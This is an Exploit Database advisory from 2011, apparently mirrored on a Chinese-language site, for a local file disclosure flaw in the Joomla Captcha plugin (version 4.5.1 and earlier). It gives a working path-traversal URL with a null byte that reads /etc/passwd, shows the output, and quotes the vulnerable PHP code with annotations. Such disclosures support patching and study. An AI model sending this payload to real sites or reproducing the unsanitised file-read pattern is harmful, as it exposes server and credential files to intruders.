Joomla! Plugin Captcha 4.5.1 – Local File Disclosure

• Exploit Database
• 31 阅读

• 作者： dun
  日期： 2011-01-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15958/

• :::::::-. ...::::::.:::.
   ;;, `';, ;; ;;;`;;;;,`;;;
   `[[ [[[[' [[[[[[[[. '[[
  $$,$$$$$$$$$$ "Y$c$$
  888_,o8P'88.d888888Y88
  MMMMP"` "YmmMMMM""MMM YM
   
   [ Discovered by dun \ posdub[at]gmail.com ]
  
   #############################################################################
   #[ Joomla Captcha Plugin <= 4.5.1 ]Local File Disclosure Vulnerability#
   #############################################################################
   #
   # Script: "Joomla Captcha plugin and patch for Joomla!"
   #
   # Script site: http://www.kupala.net/
   # Download: http://code.google.com/p/joomla15captcha/
   #
   # 
   # [LFI] (magic_quotes_gpc = Off)
   # Vuln: http://site.com/plugins/system/captcha/playcode.php?lng=../../../../../../../etc/passwd%00
   # dun@radius ~ $ cat joomlacaptcha.mp3
   # root:x:0:0:root:/root:/bin/bash
   # ......
   # 
   # File: ./plugins/system/captcha/playcode.php
   # 
   # 79	if (!$captchacode) $captchacode = '0000000000';									
   # 80	
   # 81	session_write_close();
   # 82	
   # 83	@$lng = $_GET['lng']; // [1]
   # 84	if ( !$lng ) $lng = 'en-gb';
   # 85	
   # 86	$captchafilename = "joomlacaptcha.mp3";
   # 87	$captchalength = strlen( $captchacode );
   # 88	
   # 89	$outlength = 0;
   # 90	$reallength = 0;
   # 91	$currsize = 0;
   # 92	$outstream = '';
   # 93	
   # 94	if ($captchalength > 0) {
   # 95		for ($i = 0; $i < $captchalength; $i++) {
   # 96			$soundfiles[$i] = 'files/' . $lng . '.' . strtolower( substr( $captchacode, $i, 1 ) ) . '.mp3'; // [2]
   # 97		}
   # 98		foreach ($soundfiles as $onefile){ // 
   # 99			if (file_exists( $onefile )) { // 
   #100				$instream = fopen( $onefile, 'rb' ); // 
   #101				$currsize = filesize( $onefile );// [3]
   #102				$outstream .= fread( $instream, $currsize ); // 
   #103				$outlength += $currsize; // 
   #104				fclose( $instream ); // 
   #105				$reallength += 1;// 
   #106			}
   #107		}
   #108	}
   #109	
   #110	if (($outstream == '') || ($captchalength != $reallength)) {
   #111			$outstream = 0; $outlength = 1;
   #112	}
   #113	
   #114	ob_start();
   #115	header( 'Content-Type: audio/x-mpeg'); //
   #116	header( "Content-Disposition: attachment; filename=$captchafilename;");//
   #117	header( 'Content-Transfer-Encoding: binary');//
   #118	header( 'Content-Length: '.$outlength);//
   #119	echo $outstream ;// [4] LFD
   #120	ob_end_flush();
   # 
   # 
   # [ dun / 2011-01-09 ]